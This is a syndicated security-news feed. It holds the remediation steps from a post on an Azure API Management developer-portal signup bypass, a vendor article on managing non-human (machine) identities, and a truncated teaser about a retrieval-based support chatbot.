data-e-type="container"> <div class="elementor-element elementor-element-1e94cea elementor-widget elementor-widget-text-editor" data-id="1e94cea" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Four months after Haatainen’s public disclosure, the data suggests that very few organizations have taken the remediation step of removing the Basic Auth provider. Because MSRC classified this as “by design,” there was no security advisory or automated patch to drive remediation. Organizations that use the “disable signup” toggle as their primary control may not realize that the Azure APIM signup bypass remains exploitable and that additional action is required.</p> <p><a id="remediation-closing-the-gap"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-52536c2 e-con-full e-flex e-con e-parent" data-id="52536c2" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-e870a2a elementor-widget elementor-widget-heading" data-id="e870a2a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">Remediation: Closing the Gap</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-64645fb e-con-full e-flex e-con e-parent" data-id="64645fb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fd6ecc4 elementor-widget elementor-widget-text-editor" data-id="fd6ecc4" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Because MSRC has classified this behavior as “by design,” no patch or automated fix is forthcoming. Organizations running APIM need to take explicit action to close the signup endpoint. The fix is straightforward, but the Azure Portal’s “disable signup” toggle alone is not sufficient.</p> <p><a id="X56a8c51815d2afc6c4c811ac051689e6daa59df"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b00aaf8 e-con-full e-flex e-con e-parent" data-id="b00aaf8" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-737a970 elementor-widget elementor-widget-heading" data-id="737a970" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">1. Delete the Basic Authentication identity provider entirely.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-073b3c5 e-con-full e-flex e-con e-parent" data-id="073b3c5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-638726d elementor-widget elementor-widget-text-editor" data-id="638726d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>This is the only remediation that fully eliminates the attack surface. Removing the Basic Auth provider deactivates the /signup endpoint; there is no registration mechanism left for the attacker to target.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-d8ef701 e-con-full e-flex e-con e-parent" data-id="d8ef701" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3be925b elementor-widget elementor-widget-image" data-id="3be925b" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="164" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1.webp" class="attachment-full size-full wp-image-10963" alt="Terminal window showing Azure CLI command to delete Basic Auth Provider from API Management service with subscription and resource group parameters" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1-300x51.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-delete-basic-au-1-768x131.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-79a7fbe e-con-full e-flex e-con e-parent" data-id="79a7fbe" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-2e121e6 elementor-widget elementor-widget-heading" data-id="2e121e6" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">2. Switch to Azure AD (Entra ID) as the sole identity provider.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-d41523e e-con-full e-flex e-con e-parent" data-id="d41523e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1a389e9 elementor-widget elementor-widget-text-editor" data-id="1a389e9" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Azure AD authentication ties account creation to your organization’s directory. Cross-tenant signups are not possible because users must authenticate through your tenant’s identity system. This is the long-term architectural fix. Learn more about <a href="https://learn.microsoft.com/en-us/azure/api-management/api-management-howto-aad">configuring Azure AD as an identity provider for APIM</a>.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0e1caac e-con-full e-flex e-con e-parent" data-id="0e1caac" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1537899 elementor-widget elementor-widget-heading" data-id="1537899" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">3. Require admin approval for all product subscriptions.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-dca0e3a e-con-full e-flex e-con e-parent" data-id="dca0e3a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-f497d51 elementor-widget elementor-widget-text-editor" data-id="f497d51" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Even if you cannot immediately remove Basic Auth, setting approvalRequired: true on every product prevents attackers from self-subscribing and obtaining API keys. The attacker can create an account, but cannot obtain API keys without administrator approval.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f100636 e-con-full e-flex e-con e-parent" data-id="f100636" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b272011 elementor-widget elementor-widget-image" data-id="b272011" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="204" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1.webp" class="attachment-full size-full wp-image-10964" alt="Terminal window showing Azure CLI command to set approval required on Starter product using PATCH method with JSON body" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1-300x64.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-set-approval-re-1-768x163.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-150642a e-con-full e-flex e-con e-parent" data-id="150642a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0342996 elementor-widget elementor-widget-heading" data-id="0342996" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">4. Audit existing developer portal accounts.</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-bfec1db e-con-full e-flex e-con e-parent" data-id="bfec1db" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ba1b348 elementor-widget elementor-widget-text-editor" data-id="ba1b348" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Look for accounts that were created after you “disabled” signup. Check for accounts using external email domains or accounts created via the Basic identity provider. Remove any unauthorized accounts and revoke their subscription keys.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8513f4e e-con-full e-flex e-con e-parent" data-id="8513f4e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-7a90143 elementor-widget elementor-widget-image" data-id="7a90143" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="960" height="244" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1.webp" class="attachment-full size-full wp-image-10965" alt="Terminal window showing Azure CLI command to list developer portal users with Basic authentication, displaying API endpoint URL" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1-300x76.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-azure-cli-command-to-list-developer-1-1-768x195.webp 768w" sizes="auto, (max-width: 960px) 100vw, 960px"> </div> </div> </div><p>The post <a href="https://www.praetorian.com/blog/azure-apim-signup-bypass/">Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and from the Internet</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/azure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet/" data-a2a-title="Azure APIM Signup Bypass: 97.9% of Developer Portals Still Exploitable Anonymously and from the Internet"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fazure-apim-signup-bypass-97-9-of-developer-portals-still-exploitable-anonymously-and-from-the-internet%2F&amp;linkname=Azure%20APIM%20Signup%20Bypass%3A%2097.9%25%20of%20Developer%20Portals%20Still%20Exploitable%20Anonymously%20and%20from%20the%20Internet" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by n8n-publisher">n8n-publisher</a>. Read the original post at: <a href="https://www.praetorian.com/blog/azure-apim-signup-bypass/">https://www.praetorian.com/blog/azure-apim-signup-bypass/</a> </p>

<h2>Are You Overlooking the Crucial Role of Non-Human Identities in Access Management?</h2><p>Managing Non-Human Identities (NHIs) is no longer a luxury but a necessity for robust cybersecurity. These NHIs represent machine identities, pivotal in maintaining the security protocols inherent in automated systems. The growing reliance on technology across industries necessitates an understanding of their importance. But how exactly do NHIs manage access, and why should your organization care?</p><h3>Understanding the Essence of Non-Human Identities</h3><p>The concept of Non-Human Identities revolves around machine identities created by fusing a “Secret”—an encrypted password, token, or key—and the permissions granted by destination servers. Think of it as combining a tourist and their passport; the identity is the tourist, while the secret serves as the passport enabling access to different systems.</p><p>NHIs become crucial in environments relying heavily on automation, particularly in sectors like financial services, healthcare, travel, and DevOps. Where we increasingly transition to cloud-centric operations, the demand for effective NHI management escalates. The absence of such oversight can forge significant security gaps.</p><h3>Bridging the Gap: Security and R&amp;D Teams</h3><p>One of the perennial challenges faced by organizations is the disconnect between security and Research &amp; Development (R&amp;D) teams. This gap often leads to vulnerabilities that are easily exploitable by malicious entities. The comprehensive management of NHIs offers a cohesive strategy, facilitating a seamless and secure cloud environment. By ensuring end-to-end protection, NHIs help bridge these gaps effectively.</p><h3>Lifecycle Management in NHI</h3><p>Effective NHI management involves paying meticulous attention to every stage of their lifecycle, from discovery and classification to threat detection and remediation. Such an approach contrasts significantly with point solutions like secret scanners, which offer a narrow field of protection.</p><ul> <li><strong>Discovery and Classification:</strong> Identifying and categorizing NHIs is the foundational step in establishing secure systems.</li> <li><strong>Threat Detection:</strong> Monitoring the NHIs’ behaviors within systems is crucial for detecting any anomalies or potential threats to security.</li> <li><strong>Remediation:</strong> Prompt actions based on identified threats help mitigate risks efficiently.</li> </ul><p>Understanding the entire lifecycle facilitates a context-aware security practice, offering insights into ownership, permissions, usage patterns, and potential vulnerabilities.</p><h3>Benefits of Implementing NHI Management</h3><p>Organizations committed to NHI management experience several significant advantages:</p><ul> <li><strong>Reduced Risk:</strong> Proactively mitigating security threats decreases the likelihood of breaches and data leaks.</li> <li><strong>Improved Compliance:</strong> By meeting regulatory requirements through policy enforcement and audit trails, businesses adhere to necessary compliance standards.</li> <li><strong>Increased Efficiency:</strong> Automating NHIs and secrets management allows security teams to concentrate on strategic initiatives.</li> <li><strong>Enhanced Visibility and Control:</strong> A centralized view for access management and governance empowers organizations with better security oversight.</li> <li><strong>Cost Savings:</strong> Automating secrets rotation and decommissioning NHIs significantly reduces operational costs.</li> </ul><h3>Insights into Industry Relevance</h3><p>Given the diverse range of industries relying on cloud technology, from healthcare to travel, the relevance of NHI management cannot be overstated. For DevOps and Security Operations Center (SOC) teams, efficient NHI management optimizes operations and safeguards against potential threats. Such practices translate into not just compliance and security but also a dependable operational framework that withstands the test of time.</p><p>For more on how <a href="https://entro.security/blog/harnessing-ai-in-ima-and-am/">harnessing AI in Identity and Access Management (IAM) and Access Management (AM)</a> can complement NHI management, explore strategies that lead to a more secure cyber.</p><h3>Building a Secure Cloud Environment</h3><p>The cloud has become the backbone of modern operations, transforming how businesses innovate and serve their clients. However, this transition demands a renewed focus on security. NHIs play a pivotal role, addressing prevalent security gaps and facilitating a secure cloud environment. This aligns with <a href="https://entro.security/blog/just-in-time-access-role-in-non-human-identities-access-management/">Just-in-Time access in Non-Human Identities access management </a> to ensure timely and secured permissions.</p><p>The strategic significance of NHIs becomes evident when they help manage machine identities crucial to better cybersecurity measures. Interested in a deeper dive on how this strategic approach aligns with zero trust principles? See the discussion on <a href="https://entro.security/blog/the-role-of-secrets-management-in-zero-trust-architecture/">the role of secrets management in Zero Trust Architecture</a>.</p><p>By taking a holistic view of NHI management, organizations not only protect their systems but also create an agile infrastructure capable of adapting to evolving threats. This approach represents a forward-thinking paradigm, empowering businesses to navigate the complexities of cybersecurity with confidence.</p><h3>Why Are Non-Human Identities Essential for Cloud Security?</h3><p>Have you ever considered how cloud security would function without proper oversight of Non-Human Identities (NHIs)? When organizations shift more of their operations to the cloud, they encounter an equally significant shift in focus towards safeguarding these machine identities. NHIs include encrypted passwords, tokens, and keys that effectively act as digital signatures, allowing machines to communicate securely and efficiently. When managed correctly, they provide a robust line of defense against unauthorized access and potential breaches.</p><p>Mismanagement or neglect of NHIs can severely compromise security, expose sensitive data, and even bring operations to a standstill. Ineffective NHI management has consequences that ripple through every level of an enterprise’s architecture, highlighting the essential role these identities play in digital. These challenges elevate the importance of adopting a comprehensive approach to NHI management where organizations fortify their cloud-based operations.</p><h3>Real-world Implications and Industry Challenges</h3><p>In industries like financial services and healthcare, where sensitive data is abundant, the proper management of NHIs is crucial. These sectors routinely handle large volumes of sensitive information, from financial transactions to personal health records, making them prime targets for cyberattacks. In these fields, an improperly managed machine identity can open the door to devastating breaches.</p><p>Across various industries—such as travel, DevOps, and SOC teams—the common thread of concern points to automating processes while maintaining security. Cloud technology brings unprecedented scalability and operational efficiency, but it also creates unique challenges. Companies need to integrate NHI management as a cornerstone of their cybersecurity strategy, balancing this advancement with stringent security measures.</p><h3>Understanding Technical</h3><p>Is your organization keeping pace with the latest advancements in NHI management? Behavioral analytics and machine learning, for instance, play a vital role in enhancing NHI oversight. These technologies help create advanced systems that predict and alert to abnormal behavior based on historic data patterns. Such sophistication supports a proactive security posture, catching potential threats before they manifest into full-fledged attacks.</p><p>Moreover, implementing multi-factor authentication (MFA) for machines, much like humans, adds an extra layer of security. MFA ensures that even if a machine’s “passport” or identity gets compromised, unauthorized entities cannot easily exploit system access. For insights on implementing these protocols, explore the detailed guidelines outlined in <a href="https://entro.security/blog/implementing-nhi-security-protocols/">Implementing NHI Security Protocols</a>.</p><h3>Automation: The Double-Edged Sword</h3><p>While automation contributes to efficiency and scalability, it inherently carries risks if not meticulously managed. Automating the lifecycle of NHIs—ensuring timely updates, permissions adjustments, and decommissioning—reduces the chances of security lapses. Yet, the failure to update and rotate secrets promptly could lead to vulnerabilities. This emphasizes the importance of comprehensive automation strategies to mitigate risk, as highlighted in <a href="https://entro.security/blog/how-cisos-should-prepare-for-2025/">how CISOs should prepare for 2025</a>.</p><p>Meanwhile, those involved in DevOps face parallel challenges. The speed and agility provided by DevOps necessitate machine identities to seamlessly interconnect various components within cloud infrastructure. NHI management must therefore align with DevOps methodologies, ensuring that systems are both agile and secure.</p><h3>Segmentation and Access Control</h3><p>A robust NHI management strategy necessitates precise segmentation and access control. Segmenting machine identities helps compartmentalize access and limits the scope of potential breaches. With NHIs communicate between applications, databases, and scripts, defining access parameters based on roles ensures that machines execute only what they are permitted to, preventing overreach and misuse.</p><p>In developing these frameworks, organizations gain enhanced oversight into machine communications and workflows. Such insights aid in identifying and sealing security loopholes, creating fortified, yet flexible, security postures.</p><h3>New with Artificial Intelligence</h3><p>Are you leveraging AI to optimize NHI management in your organization? Artificial intelligence introduces new managing NHIs by automating the detection of threat anomalies and proposing remediation actions. AI’s predictive modeling capabilities offer insights into access behaviors and patterns, helping refine security procedures. For more information on integrating AI into Identity Access Management, explore <a href="https://entro.security/blog/non-human-identity-security-in-saas/">Non-Human Identity Security in SaaS</a>.</p><p>Integrating AI into managing machine identities ensures a dynamic response to emerging threats, enhancing the ability to neutralize them swiftly. This merging of AI with NHI systems represents a pivotal evolution in cybersecurity dynamics.</p><p>In summary, with digital become progressively complex, Non-Human Identites and secrets management remains a pivotal component. Building and maintaining a secure cloud environment requires a concerted focus on managing these machine identities at each stage of their lifecycle. By aligning various departmental security policies and leveraging technological advancements like AI, progressive organizations will ensure robust and enduring protection across their cloud environments. With these strategies in place, businesses can boost their resilience against escalating cybersecurity threats and drive innovation, knowing their core operations remain secure.</p><p>The post <a href="https://entro.security/how-do-non-human-identities-manage-access/">How do Non-Human Identities manage access?</a> appeared first on <a href="https://entro.security/">Entro</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/how-do-non-human-identities-manage-access/" data-a2a-title="How do Non-Human Identities manage access?"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-do-non-human-identities-manage-access%2F&amp;linkname=How%20do%20Non-Human%20Identities%20manage%20access%3F" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://entro.security/">Entro</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Alison Mack">Alison Mack</a>. Read the original post at: <a href="https://entro.security/how-do-non-human-identities-manage-access/">https://entro.security/how-do-non-human-identities-manage-access/</a> </p>

Let's imagine a customer-support chatbotit's running on Red Hat OpenShift AI and searches internal documents to answer questions. A user asks it a common question, but the chatbot inadvertently retri… [+13664 chars]